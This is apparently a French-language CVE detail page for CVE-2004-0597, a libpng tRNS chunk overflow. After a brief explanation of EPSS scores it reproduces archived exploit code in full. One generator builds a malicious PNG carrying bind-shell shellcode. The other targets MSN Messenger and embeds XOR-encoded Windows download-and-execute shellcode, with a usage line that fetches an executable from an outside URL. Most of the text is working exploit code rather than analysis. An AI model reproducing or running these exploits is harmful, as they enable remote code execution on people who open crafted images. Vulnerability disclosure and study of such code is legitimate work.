CVE-2004-0597 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#include <stdio.h> #include <stdlib.h> #include "png.h" /* The png_jmpbuf() macro, used in error handling, became available in * libpng version 1.0.6. If you want to be able to run your code with older * versions of libpng, you must define the macro yourself (but only if it * is not already defined by libpng!). */ #ifndef png_jmpbuf #define png_jmpbuf(png_ptr) ((png_ptr)->jmpbuf) #endif #define ERROR 1 #define OK 0 int read_png(char *file_name) /* We need to open the file */ { png_structp png_ptr; png_infop info_ptr; unsigned int sig_read = 0; png_uint_32 width, height; int bit_depth, color_type, interlace_type; FILE *fp; if ((fp = fopen(file_name, "rb")) == NULL) return (ERROR); /* Create and initialize the png_struct with the desired error handler * functions. If you want to use the default stderr and longjump method, * you can supply NULL for the last three parameters. We also supply the * the compiler header file version, so that we know if the application * was compiled with a compatible version of the library. REQUIRED */ png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL); if (png_ptr == NULL) { fclose(fp); return (ERROR); } /* Allocate/initialize the memory for image information. REQUIRED. */ info_ptr = png_create_info_struct(png_ptr); if (info_ptr == NULL) { fclose(fp); png_destroy_read_struct(&png_ptr, png_infopp_NULL, png_infopp_NULL); return (ERROR); } /* Set error handling if you are using the setjmp/longjmp method (this is * the normal method of doing things with libpng). REQUIRED unless you * set up your own error handlers in the png_create_read_struct() earlier. */ if (setjmp(png_jmpbuf(png_ptr))) { /* Free all of the memory associated with the png_ptr and info_ptr */ png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL); fclose(fp); /* If we get here, we had a problem reading the file */ return (ERROR); } /* Set up the input control if you are using standard C streams */ png_init_io(png_ptr, fp); /* If we have already read some of the signature */ png_set_sig_bytes(png_ptr, sig_read); /* * If you have enough memory to read in the entire image at once, * and you need to specify only transforms that can be controlled * with one of the PNG_TRANSFORM_* bits (this presently excludes * dithering, filling, setting background, and doing gamma * adjustment), then you can read the entire image (including * pixels) into the info structure with this call: */ png_read_png(png_ptr, info_ptr, PNG_TRANSFORM_IDENTITY, png_voidp_NULL); /* clean up after the read, and free any memory allocated - REQUIRED */ png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL); /* close the file */ fclose(fp); /* that's it */ return (OK); } int main(int argc, char **argv) { if(argc < 2){ fprintf(stderr, "Usage: %s <png>n", argv[0]); return EXIT_FAILURE; } if(read_png(argv[1]) != OK){ fprintf(stderr, "Error reading pngn"); return EXIT_FAILURE; } return 0; } // milw0rm.com [2004-08-13]

/* * exploit for libpng, tested on version 1.2.5 * infamous42md AT hotpop DOT com * * shouts to mitakeet (hope u patched :D) * * [n00b_at_localho.outernet] ./po * Usage: ./po < retaddr > [ outfile ] * * -all u need to give is retaddr, the default file it creates is controlled by * the define below, or u can pass a diff outfile name on the command line. * the output is not an entire png, just enough to trigger the bug. i've also * included a simple program to test with. * * [n00b_at_localho.outernet] netstat -ant | grep 7000 * [n00b_at_localho.outernet] gcc pnouch.c -Wall -o po * [n00b_at_localho.outernet] gcc pngslap.c -o slapped -lz -lm lib/libpng12.so * [n00b_at_localho.outernet] ./po 0xbffff8b0 * [n00b_at_localho.outernet] ./slapped britnay_spares_pr0n.png * libpng warning: Missing PLTE before tRNS * libpng warning: tRNS: CRC error * [n00b_at_localho.outernet] netstat -ant | grep 7000 * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN * */ #include <stdio.h> #include <sys/types.h> #include <netinet/in.h> #include <fcntl.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #define OUTFILE "britnay_spares_pr0n.png" #define BS 0x1000 #define ALIGN 0 #define NOP 0x90 #define NNOPS 100 #define RETADDR_BYTES 300 #define die(x) do{ perror((x)); exit(EXIT_FAILURE);}while(0) /* identifies a file as a png */ #define MAJIC_LEN sizeof(png_majic) u_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a }; /* * appears first, gives len/width/etc. important part is setting the color type * to 0x03, byte 10 of the IHDR data. that signfies that a PALLETE chunk should * be present. but we dont have one, and that is how the len check is bypassed. * the chunk len includes only the data, not the len field itself, or the id, or * the crc at the end. these bytes are stolen from the advisory. */ #define IHDR_LEN sizeof(png_ihdr) u_char png_ihdr[] = { 0x00, 0x00, 0x00, 0x0d, /* chunk len */ 0x49, 0x48, 0x44, 0x52, /* chunk id */ 0x00, 0x00, 0x00, 0x5b, 0x00, 0x00, 0x00, 0x45, 0x08, 0x03, 0x00, 0x00, 0x01, 0x65, 0x33, 0x5a, 0xd6 /* chunk crc */ }; /* * this is the tRNS type chunk, this is the evil chunk that actually contains * the shellcode. */ #define TRNS_LEN sizeof(png_trns_len_id) u_char png_trns_len_id[] = { 0x00, 0x00, 0x00, 0x00, /* chunk len filled in*/ 0x74, 0x52, 0x4e, 0x53 /* chunk id */ /* begin chunk data */ /* retaddr, NOPS, shellcode, CRC will follow */ }; /* call them shell code */ #define SHELL_LEN strlen(sc) char sc[] = "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6" "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50" "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a" "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31" "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0" "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80" "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; int main(int argc, char **argv) { int fd = 0, len = 0, x = 0, chunk_len = 0; char *filename = OUTFILE; u_char buf[BS]; u_long retaddr = 0; if(argc < 2){ fprintf(stderr, "Usage: %s < retaddr > [ outfile ]\n", argv[0]); return EXIT_FAILURE; } if(argc > 2) filename = argv[2]; memset(buf, 0, BS); sscanf(argv[1], "%lx", &retaddr); /* create buffer: * png id - png ihdr - png trns - retaddr - NOPS - shell - crc(don't need) */ memcpy(buf, png_majic, MAJIC_LEN); len += MAJIC_LEN; memcpy(buf+len, png_ihdr, IHDR_LEN); len += IHDR_LEN; memcpy(buf+len, png_trns_len_id, TRNS_LEN); len += TRNS_LEN; for(x = 0; x < RETADDR_BYTES-3; x += 4) memcpy(buf+len+x+ALIGN, &retaddr, sizeof(retaddr)); x += ALIGN; len += x; memset(buf+len, NOP, NNOPS); len += NNOPS; memcpy(buf+len, sc, SHELL_LEN); len += SHELL_LEN; /* length of chunk data */ chunk_len = x + NNOPS + SHELL_LEN; *(u_long *)(buf+MAJIC_LEN+IHDR_LEN) = htonl(chunk_len); /* include the crc */ len += sizeof(u_long); /* create the file */ if( (fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0666)) < 0) die("open"); if(write(fd, buf, len) != len) die("write"); close(fd); return 0; } // milw0rm.com [2004-08-11]

// source: https://www.securityfocus.com/bid/12506/info A remotely exploitable buffer overflow exists in MSN Messenger and Windows Messenger. This vulnerability is related to parsing of Portable Network Graphics (PNG) image header data. Successful exploitation will result in execution of arbitrary code in the context of the vulnerable client user. Attack vectors and mitigations may differ for MSN Messenger and Windows Messenger. For Windows Messenger, the attacker must spoof the .NET Messenger service and the client must be configured to receive .NET alerts. However, MSN Messenger may be exploited through various methods in a client-to-client attack. Possible attack vectors for this vulnerability in MSN Messenger include: User display pictures Custom icons that are displayed inline in instant messages Thumbnails of transferred images Background images Since this issue may be exploited in a client-to-client attack for MSN Messenger, it is a likely candidate for development of a worm. /* * * MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit * Bug discoveried by Core Security Technologies (www.coresecurity.com) * Exploit coded By ATmaCA * Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved. * Web: http://www.atmacasoft.com * E-Mail: atmaca@icqmail.com * Credit to kozan and delikon * Usage:exploit <OutputPath> <Url> * */ /* * * Tested with MSN Messenger 6.2.0137 * This vulnerability can be exploited on Windows 2000 (all service packs) * and Windows XP (all service packs) that run vulnerable * clients of MSN Messenger. * */ /* * * After creating vuln png image, open * MSN Messenger and select it as your display picture in * "Tools->Change Display Picture". * */ #include <stdio.h> #include <stdlib.h> #include <conio.h> #include <string.h> #ifdef __BORLANDC__ #include <mem.h> #endif #define NOP 0x90 char png_header[] = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52" "\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81" "\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53"; char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF"; /* Generic win32 http download shellcode xored with 0x1d by delikon (http://delikon.de/) */ char shellcode[] = "\xEB" "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF" "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13" "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2" "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90" "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2" "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48" "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43" "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96" "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD" "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47" "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D" "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33" "\x78\x65\x78\x1D"; FILE *di; int i = 0; short int weblength; char *web; char *pointer = NULL; char *newshellcode; /*xor cryptor*/ char *Sifrele(char *Name1) { char *Name=Name1; char xor=0x1d; int Size=strlen(Name); for(i=0;i<Size;i++) Name[i]=Name[i]^xor; return Name; } void main(int argc, char *argv[]) { if (argc < 3) { printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n"); printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)\n"); printf("Exploit coded By ATmaCA\n"); printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n"); printf("Web: http://www.atmacasoft.com\n"); printf("E-Mail: atmaca@icqmail.com\n"); printf("Credit to kozan and delikon\n\n"); printf("\tUsage:exploit <OutputPath> <Url>\n"); printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n"); return; } web = argv[2]; if( (di=fopen(argv[1],"wb")) == NULL ) { printf("Error opening file!\n"); return; } for(i=0;i<sizeof(png_header)-1;i++) fputc(png_header[i],di); /*stuff in a couple of NOPs*/ for(i=0;i<99;i++) fputc(NOP,di); weblength=(short int)0xff22; pointer=strstr(shellcode,"\x22\xff"); weblength-=strlen(web)+1; memcpy(pointer,&weblength,2); newshellcode = new char[sizeof(shellcode)+strlen(web)+1]; strcpy(newshellcode,shellcode); strcat(newshellcode,Sifrele(web)); strcat(newshellcode,"\x1d"); //shell code for(i=0;i<strlen(newshellcode);i++) fputc(newshellcode[i],di); for(i=0;i<(83-strlen(web));i++) //NOPs fputc(NOP,di); /*Overwriting the return address (EIP)*/ /*0x005E0547 - ret */ fputc(0x47,di); fputc(0x05,di); fputc(0x5e,di); fputc(0x00,di); for(i=0;i<sizeof(pngeof)-1;i++) fputc(pngeof[i],di); printf("Vulnarable png file %s has been generated!\n",argv[1]); fclose(di); }